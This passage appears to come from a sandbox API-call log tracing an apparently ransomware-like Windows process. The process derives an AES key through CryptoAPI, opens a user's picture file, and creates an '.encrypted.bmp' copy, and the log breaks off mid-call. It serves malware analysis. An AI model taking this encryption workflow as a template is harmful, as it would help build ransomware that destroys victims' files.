[0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="37vI.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.640] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0040.641] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.641] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3ee1130, ftCreationTime.dwHighDateTime=0x1d5c22e, ftLastAccessTime.dwLowDateTime=0xff7d9b90, ftLastAccessTime.dwHighDateTime=0x1d5bf92, ftLastWriteTime.dwLowDateTime=0xff7d9b90, ftLastWriteTime.dwHighDateTime=0x1d5bf92, nFileSizeHigh=0x0, nFileSizeLow=0xe4ad, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="D_O37vI.bmp", cAlternateFileName="")) returned 0x7c2100 [0040.641] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.641] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.641] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0040.641] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0040.641] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.641] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.641] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0040.642] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0040.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.642] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0040.642] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.642] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.643] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.643] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0040.643] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0040.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.643] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0040.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.643] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.643] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0040.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.643] CryptDestroyHash (hHash=0x7c2240) returned 1 [0040.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\d_o37vi.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.644] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.644] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0040.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0040.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0040.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0040.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.644] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0040.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0040.645] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0040.645] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0040.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0040.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0040.646] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci")) returned 0x10 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0040.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0040.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.encrypted.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\d_o37vi.encrypted.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0040.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0040.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0040.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0040.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.647] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0040.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0040.647] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0040.647] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0040.647] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0040.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0040.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0040.648] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0040.648] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xe4ad, lpOverlapped=0x0) returned 1 [0040.651] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0040.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe4ad) returned 0xac2018 [0040.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0040.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0040.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0040.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe4ad) returned 0xad04d0 [0040.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.653] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0040.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe4ad) returned 0xac2018 [0040.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0040.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.653] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0040.653] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.653] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0040.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0040.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe4ad) returned 0xac2018 [0040.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0040.654] RtlAllocateHeap 